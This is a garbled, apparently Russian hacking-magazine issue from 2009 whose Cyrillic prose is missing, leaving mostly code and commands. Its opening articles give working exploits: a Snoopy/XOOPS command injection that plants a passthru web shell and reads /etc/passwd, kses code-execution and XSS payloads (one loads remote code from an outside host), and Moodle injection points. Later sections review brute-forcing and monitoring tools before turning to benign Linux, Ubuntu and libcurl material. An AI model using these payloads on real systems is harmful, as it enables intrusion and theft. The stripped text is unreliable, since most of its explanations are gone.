(http://google.com/codesearch), WordPress, TikiWiki, Xoops , , .
_httpsrequest():
function _httpsrequest($url,$URI,$http_method,
$content_type="",$body="")
{
...

$safer_URI = strtr( $URI, "\"", " " ); // strip
quotes from the URI to avoid shell access

exec($this->curl_path." -D \$headerfile\
"".$cmdline_params." \"".$safer_URI.""\
"",$results,$return);
...
}

WordPress
escapeshellcmd. , ?
1. evil- $URI, ;
2. evil- exec.
, , ,
, ? !

backticks ( ). :
echo "'id'"

'id', x 01 /121/ 09

id. ,
XOOPS.


, xoops-1.3.10 (
) :
1. ./html/class/snoopy.class.php, _httpsrequest()
fetch();
2. ./class/phpsyndication.lib.php
:
require(XOOPS_ROOT_PATH."/class/snoopy.class.php");
...
function getData($forcecache=false)
{
...
$snoopy = new Snoopy;
...
$snoopy->fetch($this->sourceUrl);
$data = $snoopy->results;
...
}
function getHtml($fromcache=false)
{
$data = $this->getData($fromcache);
...
function getTitle($fromcache=false)
{
$data = $this->getData($fromcache=false);

getTitle() getHtml();
3. ./html/modules/headlines/blocks/headlines.
php :
<?php
...
include(XOOPS_ROOT_PATH."/class/phpsyndication.lib.
php");
...
$result = $xoopsDB->query("SELECT hid, sitename,
url, headlinesurl, status FROM ".$xoopsDB->
prefix("headlines").
" WHERE status=1 OR status=2");
...
$block['content'] .= "<b>".$synd->getTitle()."</b><br
/>";
$block['content'] .= $synd->getHtml();
...
?>

063

>>

SpellChecker TinyMCE

links
wiki.moxiecode.
com/index.php/
TinyMCE:Plugins/
spellchecker wiki
SpellChecker
TinyMCE.
securityfocus.com/
bid/31887 Snoopy
advisory.
snoopy.sourceforge.
net

Snoopy.
www.securityfocus.
com/archive/1/414573
Advisory Xoops,

Snoopy.
xoops.ru
Xoops.

064

,
getTitle() getHtml().
:
1. headlinesurl
https://'echo '<?passthru($cmd)?>' >> xox.php'
( headlines;
, );
2. XOOPS 
headlines
URL;
3. ,
http://victim.com/xoops-1.3.10/html/class/
xox.php?cmd='cat /etc/passwd'.
, Snoopy
, , , . .


kses (PHP- ).
Kses ,
WordPress, Moodle, Drupal, eGroupware, Dokeos, PHP-Nuke,
Geeklog .
code exec
preg_replace /e:
function kses_bad_protocol_once($string,
$allowed_protocols){
return preg_replace('/^((&[^;]*;|[\sA-Za-z09])*)'.
'(:|:|&#[Xx]3[Aa];)\s*/e', 'kses_bad_
protocol_once2("\\1", $allowed_protocols)',
$string);
}

(,
phpinfo)
kses_bad_protocol_once() :
<a href="&#{${phpinfo()}};:">H4ck</a>

, WordPress ,
, ,
wp_kses_normalize_entities() : &
&amp;
$string = str_replace('&', '&amp;', $string);


WordPress ,
. , . ,
. ,
, Moodle.

.
:
$injection_points = array(
'blocks/rss_client/block_rss_client_error.
php' => array('error'),
'course/scales.php?id=1' => array('name',
'description'),
'help.php => array('text'),
'login/confirm.php' => array('data', 's'),
'mod/chat/gui_basic/index.php?id=1' =>
array('message'),
x 01 /121/ 09

>>

Snoopy

'mod/forum/post.php' => array('name'),


'mod/glossary/approve.php?id=1' => array('hook'),
'mod/wiki/admin.php' => array('page'),

XSS WordPress kses

(Opera) <a href="%0Bjavascript:alert(document.


domain)">lol</a>
(Firefox) <a href='%08data:text/html;base64,PHNjcmlwdD5
hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2B'>test</a>

- :
$value = '<img src=http&{${eval($_POST[cmd])}};://
target.ru>';

eval() :).
code exec , XSS. phpMyFaq , XSS kses
. .

XSS
kses
javascript kses_bad_
protocol_once2().
urldecode() %0B ( ) %08 ( ).
PoC ( ):

! kses
style, kses XSS,
CSS.
:
(Firefox) <a style=" ;\2d\6d\6f\7a\2d\62\69\6e\64\69\
6e\67: \75\72\6c(\68\74\74\70\3a\2F\2F\68\61\2E\63\6B\
65\72\73\2E\6F\72\67\2F\78\73\73\6D\6F\7A\2E\78\6D\6C
\23\78\73\73)" href="http://example.com">test</a>

.

, ,
advisory , . z

WP kses

x 01 /121/ 09

065

>>


PE-, Win32
. , , . ,
, / IDA Pro.
,
, Potable Executable (,
, PE).
. , ,

(, ).

, .
ntoskrnl.exe,
//. , ,
Windows (
wine) , ,
.
(
)
crackme (kpnc.org/ftp/KedaH3.zip),
(IDA Pro, OllyDbg, HIEW, etc).
, .

066

PE- , (raw)
. ,
: ,
. (physical)
(virtual).
,
, ,
PE-, . (
) , -
,
,
/ .
, , (Virtual Size
Physical Size) .
, , PE-. ,
10h , 100h,
/ 1000h. , ,
10h . x 01 /121/ 09

>>

KedaH3.exe, ,

HIEW

, IDA Pro KedaH3.exe


KedaH3.exe
100%

( , , PE-
). ,
, 10h
, ... ? ,
.
. ,
10h . , .
,
. , IDA Pro (
5.3 ), HIEW,
DUMPBIN .


, ,
. .
( ), .
. ,
, , , .
, . ,
( W2K, S2K3 XP),
- .no pain no gain. : condomprinciple: itd rather have one and not need it that need it and not have one.
, condom ,
. , crack-me
MessageBoxA.
HIEW , ; ,
HEX-mode (<ENTER>)
<F8> (Header), <F5> (Entry). ... ! ,
. , . ,
401010h, 10h
x 01 /121/ 09

.text, ,
<F8>.
! HIEW ! . : The input file contains
non-empty TLS (Thread Local Storage) callback table. However, IDA Pro
couldnt find the TLS callback procedures in the loaded code TLS callback, IDA Pro
TLS callback .
, , .
KedaH3.exe IDA Pro RETN,
.text:00401000 _text segment para public 'CODE' use32
.text:00401000
assume cs:_text
.text:00401000 ;org 401000h
.text:00401000 assume es:nothing, ss:nothing, ds:_data,
fs:nothing, gs:nothing
.text:00401000
retn
.text:00401000
.text:00401001
dd 3 dup(?)
.text:0040100D
db 3 dup(?)
.text:00401010
public start
.text:00401010 start dd 8 dup(?)
.text:00401010 _text ends

, , RET,
, - .
MessageBoxA? ? ! TLS Callback
, , , .
KedaH3.exe , ... .
, , , , 100% .
. (
, ),
, , , .

067

>>

KedaH3.exe HEX- ,
- ,

(manual load) ,
IDA Pro 5.3

, KedaH3.exe (
)
, ,
Windows.


HIEW. , HEX- .
/ ,
/
HEX-. .
( , ?)
,
.
, (
401000h) <ENTER> . - ,
(RETN) , HIEW
.
. , HIEW , , ,
. crack-me HIEW .
HIEW , .
, , . , . ,
ENTER,
Manual Load, Load File of New
Format, . , !
IDA Pro 5.2 , 5.3, ,
,
.
KedaH3.exe, IDA Pro 5.3

00401010 public start
00401010 start proc near
00401010
dec
eax
00401011
retn
00401011 start endp
00401011
00401012 loc_401012:

; CODE XREF: .text:00401049vj
00401012
push
offset a_noPainNoGain_

; " .no pain no gain. "
00401017
push
offset unk_403018

068

HIEW ,
,

0040101C
push
0
0040101E
call
ds:MessageBoxA
00401024
xor
eax, eax
00401026
mov
eax, [eax]
00401028
db
65h
00401028
jp
short near ptr dword_4010A0
0040102B
insd
00401030
00401030 public TlsCallback_0
00401030 TlsCallback_0:

; CODE XREF: .text:0040103Bvj
00401030
mov
esi, esp
00401032
lodsd
00401033
lodsd
00401034
mov
al, 10h
00401036
mov
ah, al
00401038
xchg
eax, esi
00401039
lodsb
0040103A
dec
eax
0040103B
jnp
short TlsCallback_0
0040103D
xor
eax, eax
0040103F
push
eax
00401040
mov
al, 30h
00401042
mov
esi, fs:[eax]
00401045
inc
esi
00401046
dec
byte ptr [esi+1]
00401049
jnp
short loc_401012
0040104B
xor
eax, eax
0040104D
mov
eax, [eax]
0040104D
0040104D ; ------------------------------------------00403000 a_noPainNoGain_ db ' .no pain no gain. ', 0

; DATA XREF: loc_401012^o
00403018 aCondomPrincipl db 0Ah

; DATA XREF: .text:00401017^o
00403018
db 'condom-principle',0Ah, 0Ah
00403018
db 9,'it',27h,'d rather have one and not
need it... '
x 01 /121/ 09

>>

KedaH3.exe IDA Pro 5.3 (


)

00403071 TlsIndx
db 'http://kpnc.org',0

; DATA XREF: .data:TlsIndex_ptrvo
KedaH3.exe
00403090 TlsDirectory dd offset TlsDirectory

; DATA XREF: .data:TlsDirectoryvo
00403094 TlsEnd_ptr
dd offset TlsDirectory
. KedaH3.exe , 00403098 TlsIndex_ptr dd offset TlsIndex
<F12> (Pause), TLS Callback
<Ctrl-G> (Goto), 401030 ( TLS Callback
; "http://kpnc.org"
IDA).
0040309C TlsCallbacks_ptr dd offset
401030
TlsSizeOfZeroFill
Breakpoint, Hardware, on execution.
Debug Hardware breakpoints, ,
004030A0 TlsSizeOfZeroFill dd offset
, <CTRLTlsCallback_0
F2> (Restart),
Yes
004030A4 TlsCharacteristics dd 0
TLS Callback,
!
... .
IDA Pro Debugger
DEC EAX/RET, ( 5.3).
. , ,
<CTRL-E>
.
TlsCallback_0, <F2>
( , ?),
<F9>. ! TLS callback ,
, .
, TLS callback . ,
crack-me !
, (, ?),
, !
, . ,
,

00401049 jnp short loc_401012 .
,
.
.
( ) . , CALL ds:MessageBoxA
:
XOR EAX, EAX/MOV EAX,
[EAX], .
1. ,

SEH- ( )
2. XOR EAX, EAX/MOV EAX, [EAX]
, RET
...
3. PE- .
/
! ?


. , .
condom-principle... http://
, ?
kpnc.org, ,
. . . :
PAUSE - MessageBoxA URL? ,
. ,
, Windows ...
, TLS
callback crack-me, , .
, ,
, ,
( ,
, crack-me
).
.z
x 01 /121/ 09

links
Microsoft Portable
Executable and
Common Object File
Format Specification:
microsoft.com/whdc/
system/platform/
firmware/PECOFF.
mspx.
KedaH3 Crack
Me: kpnc.org/ftp/
KedaH3.zip.

069

>>
R0id
/ r0id@bk.ru /


: Skype Bruter
: *nix/win
: mr.The

.

:).
P.S. PHP
. ,
, .
: InVizer
: Windows 2000/XP
: & JaH

/
/
.

.
.
!
GUI- , , !


- Skype-,
.
,
Skype- $1. ,
:
. ,
Skype Bruter,
:).

PHP curl.
base.txt :
https- proxy.
txt. ,
:
base.txt
:
log.txt
ua.txt (
)
proxy.txt -
sk.php

, ,
: ,

070

5. /

6.
<Ctrl+Z>
7.
8.
9.

10.
11.

: StaffCop
: Windows 2000/XP
: staffcop.ru



. ,

, ?
:). ,

InVizer.
ICQ-
:
1. ( log.txt)
2. icq-
3. timeout (
)
4. ( )


/ -,


:).
StaffCop,

. ,

,
/ .
:
1. .
, ,
x 01 /121/ 09

>>
- , .
.
2. .

. ,
.
.
3. -.
- . URL-,
( title), .
, :).
, ,
, .
4. ICQ MSN Messenger.
IM
(ICQ MSN) UIN ICQ MSN,
,
( ),
.

.
5. USB-. , USB, .
6.
. / (aka
) .
.
.
7. .
(aka ) .
, Windows
:).
, , ,
,
. , ,

, .
: GetBrute
: Windows 2000/XP
: dimas

URL, -. ,
.

GetBrute,
GET- url.
aka data.
ini,
:
1. [connection]:
url (
* , ^
).
HandleRedirects 0 1 1,
403.
x 01 /121/ 09

-
Timeout , 0 (0 ).
2. [ident]:
good , ,
.
bad ,
.
3. [files]:
decrease 0 1 , 0, brute.txt
, 1.
readgood 0 1 , 0 good.txt
,
,
1.
,
good.txt (), bad.txt (-)
error.txt (). , aka errors
, ,
,
ident, good
bad.
:
ESC ;
SPACE .

, ,

.
: Find proxies for Me
: Windows 2000/XP
: NemeZz
, ,
:). ,
-, ,
. ,
proxy4free.com/page1.html , :
67.69.254.244:80

anonymous

Canada

2008-12-01

Whois
218.14.227.198:3128

anonymous

China

2008-12-01

Whois
60.10.59.76:3128

anonymous



China

2008-12-01

Whois
61.55.135.1:80

anonymous

China

2008-12-01

Whois
61.166.68.71:80

high anonymity

China

2008-12-01

Whois
202.98.23.114:80

anonymous

China

2008-12-01

Whois
208.62.125.146:80

high anonymity

United States

2008-12-02

Whois
89.234.27.15:80

anonymous

Great Britain (UK)

2008-12-02

Whois
202.98.23.116:80

anonymous

China

2008-12-02

Whois

,
/PHP, ,
Find proxies
for Me,
.
, :
1. (
txt/html/htm/mht
, )
2. (
)
3.
4.

5. IP (
IP aaa,bbb,ccc,ddd<=255,
eeeee<=65536)

DVD. z

071

>>
Mifrill
/ mifrill@riddick.ru /


Web 2.0. . , ,
, Web 2.0 . , ,
,
. , ...

-, ... , . .
, . , ,
.
. , .
, , .
,
! , -

072

MUD ,
, . : ( mmorpg massively
multiplayer online role-playing game) .
World of warcraft, Lineage II, EVE online ()
Second Life.
, , - Sims, ,
. ,
x 01 /121/ 09

>>

2008 Second Life



Technology & Engineering
Emmy Awards

Second Life
, BusinessWeek The Economist.

,
, ,
. , .
(Philip Rosedale). ,
,
.
, ,
, - , , , .
, 6-7 ( Apple II)
.
17 .

. 1994,
, . , ,
-. ,
.
, ,
. , , ,
! , .
90 3D
,
, , , (,
Second Life ).
.
,
. , , -.
, ,
,
. , ,
,
, .
, .
x 01 /121/ 09

, .
FreeVue,
.
,
RealNetworks
(Rob Glaser), 1996 .
, ,
RealNetworks.
, ,
, , .
, ,
. , ,
, .
1999. ,
,
RealNetworks, Linden Alley
. ,
Linden Labs, . (Andrew Meadows),
... .
, . ,
, ,
- , , .
( ),

. ,
, .
- ,
. .

-
.
,
, .
, Second Life
,
.
( \)
.
,
; , ,
, . ,
- ?.. Second
Life ,
. ,
, ,
, . ,
Second Life .
( 2003 ) Linden Labs ,
. 31
,
. , 11,
.
,
. , , ,
, ,
, .

073

>>
, , , ,
, .
,
- ,
. Second Life , , , ,
. Second
Life ,
, , .
.
, Second Life , .
, , ,
, . , :
, !, .
Linden Labs Linden,
( ). -
.
Second Life ,
, .
, . , , ,
, ,
, . , 3D- Second
Life . 2003-
, ,



. ,

Second Life Ginko Financial,


$700.000 .
Linden Labs ,
( ),
,
.
, , ,
.
, , , .
, ,
,
. , Linden Labs
, , ,
, .
.
, ,
:
, , ,
. , ,

074

,
. , , .

, Second Life
, ,
. ,
?
, ,
, Linden Labs
. , ,
-, Linden Labs x 01 /121/ 09

>>
,

, ,

. ,
,
, ,
.
- , . -

,
, . ,
.
. ,
, , x 01 /121/ 09

, .
. ,
Second Life . , , 15 ., , .
- , ,

. ;

45-50 . .
Second Life ,
,
... ,
. Second Life -
(
Linden Labs. , ). ,
.
, - ,
. ,
.
.
, Second Life (L$) . ,
280 .
, 2008 , , 22
. , Linden Labs

, ,
.
,
2007 . Second Life
Ginko Financial, $700.000
.
Linden Labs , ( ),
,
. , Linden Labs.
, ,
2007 . ,
, Linden Labs , . ,
.

, , ,
, .
Dell Sun
2007 .
. ,
,
. ,
Second Life 20062007 , , ,
( Reebok).
, ,

Second Life . , .
, Second Life

075

>>

, SL ,

, . ,
,
,
, .
,
,

.
, ,
(sic!)
, ,
. ,
.
. ,
, . ,
Second Life. ,
. ,
300
, , Linden Labs .
,
. ,
.
, .
, ,
. 5 10,
, .

Second Life
: , ,
, , , , ,
.
, , . Second
Life : , , ,
, , , , . , , ,
Second Life ,

. Linden Labs
, L$ ,
, . , .
, ,
:).
, ,
,
. ,
Second Life . , ,
.
,
,
. ,
Linden Labs. ,
, , ,
PG ,
.
( ,
,
) ID, -

076

Second Life,
, . ,
. , , , .
, , ,
Second Life , ,
.
, , ,
,
, , ,
, . ,
Second Life ,
,
. , , . , , Second Life
. - ,
, .
.
, . ,
, . ,
,
. , ,
, . , , , . z
x 01 /121/ 09

>>

>>

.


, moroz (moroz56@rambler.ru) . .

(ex-demon@inbox.lv) ,
.

, Kir Rost (dvar1@xakep.ru).

- , (beldimonau@mail.ru).

. .
, glowren (glowren@yandex.ru).


(naviero@rambler.rul) .

078

x 01 /121/ 09

>>
magazine@real.xakep.ru
( )
!

,
, ,
(karapanov@mail.ru) - .

, , (a.i.melnichenko@mail.ru)
.

(sergeyvmk@gmail.com)
.

ua (traffshow@gmail.com) .

(el_griton@inbox.ru)
.

, Robert Schweppes (r.schweppes@gmail.com)


.

x 01 /121/ 09

079


1 2009

2008
!

www.gameland-award.ru

Metal Gear Solid 4: Guns of the Patriots


Command & Conquer: Red Alert 3
Tomb Raider: Underworld
Super Smash Bros. Brawl
Guitar Hero: World Tour
Grand Theft Auto IV
LittleBigPlanet
Prince of Persia
Devil May Cry 4
Soul Calibur IV
Gears of War 2
Mirrors Edge
Fallout 3
Fable II

2009

>> unixoid
j1m
/ zobnin@gmail.com /

,
. 20
,
.
.

. (
) , .
, Linux ,

.
hdparm:
# hdparm -B 1 -S 12 /dev/sda

-B 1
. 254 :
1 127 ,
.
,
hdparm -i /dev/sda
AdvancedPM. -S 12 ,
60 .
255 : 1 240
5 , 0 .
, ,
,
.
, . , :
:

082

# echo 5 > /proc/sys/vm/laptop_mode


# echo 'vm.laptop_mode=5' >> /etc/sysctl.conf

,
, .
, ,
.

( ,
,
) 5 15 30:
# echo 1500 > /proc/sys/vm/dirty_writeback_centisecs
# echo 'vm.dirty_writeback_centisecs=1500'

syslogd.

(
). ,
/etc/syslog.conf.
atime .

( POSIX).
,
.
, . atime
noatime :
x 01 /121/ 09

>> unixoid

hdparm

PowerTOP

# mount -o remount,noatime /
# echo '/dev/ _ ext3 noatime 0 1'
>> /etc/fstab

noatime ,
.
,
, relatime.

,
. ,
, , /var/mail, . , .

(
, Ubuntu?).

(,
UPS). noatime

.
syslogd
.

LCD- . , -
. ,
- ,
,
. ,
, .
, . X.Org 7.3,
xbacklight, .
,
(70% ) :
# xbacklight -set 70

50% . cron ,
100% , 75% , 50% .
(, -
).
. , ,
, . . xrandr
, LCD- (LVDS):
# xrandr --output --off

, ,

, flash ( , )
, .
, ,
,
. , flash- , ,
- ,
, .
x 01 /121/ 09

,
,
3D-.


. Linux ,
. (P-state), . ,
, :
# ls /sys/devices/system/cpu/cpu0/cpufreq

, , .
:
# cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_
available_governors

083

>> unixoid

hdparm.conf ubuntu


Intel SpeedStep
. ,
.
( ) ,
.
# echo ondemand > /sys/devices/system/cpu/
cpu0/cpufreq/scaling_governor

,
:

info

Intel


:

,

,

, Enhanced Intel
SpeedStep.

084

# echo 1 > /sys/devices/system/cpu/sched_mc_


power_savings

,
. , ,
.

.
, ,
- 2-3
.
, Wake On
Lan .

. -

,
/ , .
, ,
,
.
Wake on Lan BIOS
ethtool:
# ethtool -s eth0 wol d

ethtool eth0, Wake-on


(g , d ).

, 1 / ( , ),
100 / ( 10
/). , ,

.
ethtool:
# ethtool -s eth0 autoneg off speed 100

autoneg off , speed 100


100 /.
(, ,
):
# ethtool -s eth0 autoneg on speed 1000

, WiFi- PS-Poll (Power Save Poll


protocol), , ,
, .
PS-Poll
x 01 /121/ 09

>> unixoid
. ,
.
,
,
. , -
, ,
:
# iwpriv eth1 set_power 5

,
. : 1 , , 5
, 6 .
, ,
.
WiFi-,
.
,
,
WiFi- :
# for i in 'find /sys -name "rf_kill"'; do echo 1 > $i;
done

:
# for i in 'find /sys -name "rf_kill"'; do echo 0 > $i; done

WiFi, - bluetooth, , ,
. ,
,
:
# hciconfig hci0 down
# rmmod hci_usb

, bluetooth-
USB-.

, DVD-

hdparm
Debian /etc/hdparm.conf,
.
. hdparm,
:
# vim /etc/hdparm.conf
/dev/sda {

apm = 1

spindown_time = 12
}
x 01 /121/ 09

Compaq Evo N620c


(Pentium M 1,3 GHz/1 Gb RAM/40 Gb HDD)
OpenBSD 4.4current, (600
MHz) ,
:
% sysctl hw | egrep 'model|speed'
hw.model=Intel(R) Pentium(R) M processor 1300MHz
(GenuineIntel 686class)
hw.cpuspeed=600
% apm
Battery state: high, 95% remaining, 0 minutes life
estimate
A/C adapter state: connected
. ,
, Gnome, KDE, XFCE -, hald,

. , hald
2 .

CD , :
# hal-disable-polling --device /dev/cdrom

. ,
. , ,
, -,
, .

AC97, . Linux-
, -
. ,
,
:
# echo 1 > /sys/module/snd_ac97_codec/parameters/power_
save

, , Intel HD Audio,
.
,
ALSA-. , :
# cat /sys/module/snd_hda_intel/parameters/power_save

. powertop (www.lesswatts.org/
projects/powertop)! ,

,
. z

085

>> unixoid
bober
/ zloy.bobr@gmail.com /

Ubuntu 8.10 KUbuntu 8.10:

, , Canonical Ubuntu 8.10. 8.04 LTS ,


very cutting release development
branch. , .

Ubuntu 4.10 Warty Warthog
(-) 20 2004 Debian, :
( ), , .
Just Work ( ) , ,
.
Debian

. ,
Distrowatch.com . 5.04
Hoary Hedgehog ( ), Ubuntu 1
- .
Ubuntu
Gnome. 2005 KDE,
, KDE Kubuntu,
. 5.10
Edubuntu, , 6.06
Xubuntu XFce, 7.04 Ubuntu Studio ( ),
8.04 Ubuntu Server Edition JeOS ( ).
, , (
). Ubuntu
, .
Ubuntu unstable- Debian,
APT , . -

086

,
. , Debian Multimedia
(debian-multimedia.org) Medibutu (www.medibuntu.org, Multimedia,
Entertainment & Distractions In Ubuntu). ,
source.list.
, (
) .
6.06 2 . .
Ubuntu 1,5 , 3.
6.06,
LTS (Long Term Support). (3
5 , ) , .
Ubuntu .
, ,
, 1,5 (
2010).


Ubuntu .
8.10.
Intrepid Ibex. ,
,
. , Intrepid Ibex
. ,
, ,
. ,
x 01 /121/ 09

>> unixoid


Update Manager

, .
Ubuntu 8.04, ,
.
LTS. KUbuntu 8.04 ,
( 2008) KDE 4 ,
( -
Kubuntu 8.04 KDE 4 Remix), KDE
3.5. .
Intrepid .
. KDE 3 Kubuntu 8.10
(KDE 4.1.2). KDE 4
Ibex KDE 3. ,
Amarok2, (
Mandriva 2009), Amarok. , , 8.04.
, .
: 2.6.27
Xen, X.Org 7.4
. ,
ecryptfs-utils,
.
, 0700 , :
$ sudo apt-get install ecryptfs-utils

~/Private:

LiveCD LiveUSB

Linux-
. DKMS
, -
Linux- ,
.
.
.
Last successful boot
.
PackageKit,
D-Bus. API,
. PackageKit
yum, apt, conary, zypp ..
, RedHat , service.
Ubuntu, ,
- :
$ sudo /etc/init.d/apache2[start|stop|restart]


:
$ sudo service apache2 [start|stop|restart]

, .
.

$ ecryptfs-setup-private

, !
. ,
, .
, .evolution/, ssh/, .gpg/:
$ mv ~/.evolution ~/Private
$ ln -s ~/Private/.evolution ~/.evolution

guest ( fast-user-switch-applet),
.
:
, , . ,
.
DKMS (Dynamic Kernel Module Support, linux.
dell.com/projects.shtml#dkms)
x 01 /121/ 09

8.04 , 8.10
. :
$ kdesudo adept_manager --dist-upgrade-devel

Adept (Version Upgrade).


, , updatemanager -d. New distribution release
8.10 is available. Upgrade . Kubuntu
,
:
$ sudo apt-get install update-manager

, . , ATI.

087

>> unixoid

GNOME

info

psubuntu.
com/wiki/
IntrepidReleaseNotes
, Alternate
PlayStation 3.
Ubuntu
Customization Kit
(uck.sourceforge.net)
, LiveCD- Ubuntu (
Kubuntu, Xubuntu
Edubuntu).

088

.
Nvidia,
X.Org 7.4,
. , Xmodmap X.Org.
KDE ,
, .
Kubuntu 8.04 KDE 4 Remix 8.10
kubuntu-desktop, kubuntu-kde4desktop
.

. : i386 x64, Desktop (LiveCD) Alternate (CD).
BitTorrent DVD- .
CD
.
, Windows Wubi (wubi-installer.org).
Ubuntu/KUbuntu 256
(Alternate) 384 (LiveCD) ,
, 4 (
XUbuntu ).
,
, .
, . ,

. Desktop 8.04
( ).
Ubuntu. ,
LiveCD
, Alternate
.
.
<F6>,
(acpi=off, nolapic,
noapic). (restricted) .
LiveCD-
. , (, )
.

Ubuntu
GNOME 2.24.1 Human
- ,

. ,
, ,
. . ,
LiveCD LiveUSB. Network Manager 0.7
3G- PPP/
PPPoE-.
.
SMB- Nautilus. , ,
. ,
(CD, USB), .
Rhythmbox Totem.
,
.
Totem ,
BBC (www.bbc.co.uk)
YouTube (www.youtube.com).
- File Roller,
(ALZ, RZIP, CAB, TAR, 7Z
).
Monitor Resolution
Settings
XrandR (X Resize and Rotate Extension, -,
-,
, ).
Synaptic
gnome-app-install. Synaptic
Quick Search,
, .
.
Software Sources source.list.

, 7 ( Kubuntu 6),
.
. Ubuntu Migration assistant,

Windows.
, -,
x 01 /121/ 09

>> unixoid
, GRUB ( hd0).

KUbuntu
, ,
KDE. ,
GNOME!
Plasma
KDE. ,
. , , ,
(, ,
).
, Mandriva 2009.
QuickAccess, ,

. QuickAccess
Dolphin ( 1.1), ,
, . , Dolphin
, .

<Ctrl>. .
+ - .
. , , KDE ,
. ,
, KWin (, ,
<Alt+Tab>). KDE
, Oxygen -
( ).
.
, Kickoff,
. , OpenOffice.org 3.0 2.4.1;
,
. , , Mandriva
2009, , 3.0.

Adept 3.0.
update-notifier-kde.
KDE 4 KDE 3
, KDE 3 Intrepid,
. ,
.
, . KDE 3
KDE 4 ,
, Gnome, XFce, IceWM.
sources.list :

Ubuntu 8.10
Kernel 2.6.27
X.Org 7.4
Compiz 0.7.8
GNOME 2.24.1
KDE 4.1.2
XFCE 4.4.2
OpenOffice.org 2.4.1
Firefox 3.0.3
Samba 3.2
Pidgin 2.5.2
Rhythmbox 0.11.6
$ sudo nano -w /etc/apt/sources.list
deb http://apt.pearsoncomputing.net/ intrepid main
deb-src http://apt.pearsoncomputing.net/ intrepid main

:
$ wget http://apt.pearsoncomputing.net/public.gpg
$ sudo apt-key add public.gpg

KDE:
$ sudo apt-get update
$ sudo apt-get dist-upgrade
$ sudo apt-get install kde3 jockey-kde

KDM.
:
$ sudo ln -s /usr/share/apps/kdm/themes/Krystal/ /usr/
share/apps/kdm/themes/kubuntu

network-manager.
, :
$ sudo apt-get remove knetworkmanager network-manager-kde

,
nm-applet:
$ sudo ln -s /usr/bin/nm-applet ~/.kde/Autostart/nm-applet

VM Builder
Intrepid Ibex
VM Builder, Xen, KVM VMware. ,
VM Builder Python. Ubuntu
8.10 .
,
Ubuntu,
,
VMware VMotion.
x 01 /121/ 09

, , Medibutu:
$ sudo wget www.medibuntu.org/sources.list.d/intrepid.
list \ -O /etc/apt/sources.list.d/medibuntu.list

, :
$ sudo apt-get update && sudo apt-get install medibuntukeyring
$ sudo apt-get update && sudo apt-get dist-upgrade

, KDE?
Neon (amarok.kde.org/en/node/482).

089

>> unixoid

KDE 4
( ) Amarok2 Kubuntu
( openSUSE),
KDE 4. sources.list :
$ sudo nano -w /etc/apt/sources.list
deb http://ppa.launchpad.net/project-neon/ubuntu
intrepid main

:
$ sudo apt-get update
$ sudo apt-get dist-upgrade
$ sudo apt-get install kde-nightly

8.10 , ,
, , ,
. Kubuntu 8.04 LTS,
.
. 23
2009 , (Jaunty Jackalope). ,
,
! z

Windows

, Neon ,
. .
, Kubuntu
Members (launchpad.net/~kubuntu-members).
:
deb http://ppa.launchpad.net/kubuntu-memberskde4/ubuntu hardy main multiverse restricted
universe/

Kubuntu Members KDE 4.1.1,


4.1.3.

090

x 01 /121/ 09

>> pc_zone
j1m
/ zobnin@gmail.com /

Tipsntricks

X Window
Firefox
( ~/.mozilla/firefox/_.default/chrome/userChrome.css):
* { font-size: 10pt !important }
.Xdefaults:
$ xrdb ~/.Xdefaults

Multimedia
DVD ,
700 :
$ mencoder dvd:// -ovc xvid -oac
mp3lame -xvidencopts \

bitrate=-700000 -o .avi
3gp:
$ ffmpeg -i .avi -s qcif -r 12
-ac 1 -ar 8000 \

-b 30 -ab 12 -.3gp

PDF- PNG- ( ):
$ convert .pdf -%03d.
png
$ convert *.png file.pdf

Shell

:
$ chmod -R a+X *
cdl,
:
$ echo function cdl() { cd $1; ls }
>> ~/.profile
:
$ cd +2
$ cd -3

FLV MPEG
mencoder:
$ mencoder youtube-.flv \
-ofps 15 -vf scale=300:-2 \
-oac lavc -ovc lavc -lavcopts \
vcodec=msmpeg4v2:acodec=mp3:\
abitrate=64 -o .avi

ZSH:
$ /tmp/nc-110/> cd 0 1
$ /tmp/nc-111/>

FLV MPEG ffmpeg:


$ ffmpeg -i youtube-.flv \
-sameq -ab 192 .avi

,
:
$ (cd /source/directory && tar cf - .
) | (cd /dest/directory && tar xvfp
-)

FLV SWF:
$ ffmpeg -i youtube-.flv \
swf-.swf

24x24:
$ mkfifo bmovl
$ convert .png .rgb
$ mplayer -vf bmovl=0:1:./bmovl
videoclip.avi
$ echo !"RGB24 24 24 10 10 0 1" >
bmovl
$ cat logo.rgb > bmovl
x 01 /121/ 09

cd
( Bash):
$ echo complete -d cd >> ~/.profile


, (>
file):
$ export NULLCMD=cat
$ export READNULLCMD=more
ZSH:
$ setopt autocd
$ alias -g ...='../..'
$ alias -g ....='../../..'
$ alias -g .....='../../../..'

GNU Screen
: Ctrl+A S
: Ctrl+A Tab
, : Ctrl+A Q
: Ctrl+A X
screen :
Ctrl+A F

Vim
vim:
:help!
:help 42
:help quotes
:help holy-grail
:
:set tabstop=4 shiftwidth=4
expandtab

:
:echo 0xea
vim
:
:scriptnames

ISO tar
( BSD):
$ tar -tf .iso
ISO Midnight
Commander <F3> ( ~/.mc/
bindings):
regex/\.(iso|ISO)$

View=%view{ascii} tar tvvf %f
, syslog :
# echo '*.* /dev/tty8' >> /etc/
syslog.conf z

091

>> coding

/ asterganster@gmail.com,
http://www.livedevice.com /

-
cURL Builder C++

-
-,
. ? , ,
, .
, libcurl C++ (Builder
6 C++ ). ,
libcurl: HTTP HTTPS, ,
, POST GET,
cookies. libcurl ,
, , .

cURL
cURL (client URL) 20 1998 .

(Daniel Stenberg). http://daniel.haxx.se.
, cURL? ? ,
,
-,

. cURL

092

API-.
cURL : cURL-
DLL Libcurl libcurl.dll . .
libcurl . FTP, FTPS, HTTP, HTTPS,
SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS, SSL, POST HTTP,
PUT HTTP; proxy (HTTP +
, Socs4, Socs5) , cookies
. , cURL
UNIX- , Mac OS X Windows.
http://curl.haxx.se.


libcurl Builder C++
, , ,
, Windows XP (, win32,
Windows2000). , , Builder 6 C++ (, ).
x 01 /121/ 09

>> coding

CURLOPT_WRITEDATA

, cURL
Download : http://curl.haxx.se/download.
html, Win32Generic
libcurl.
, libcurl,
. Bin
*.dll ( curl.exe ).
Bin Builder C++.
libcurl curl \Include\curl
, .
Include Builer C++. .
!

. easy
libcurl
,
Builder C++ libcurl
. Builder
button1, ,
. libcurl.dll libcurl
:
libcurl.dll
HINSTANCE cl = NULL;
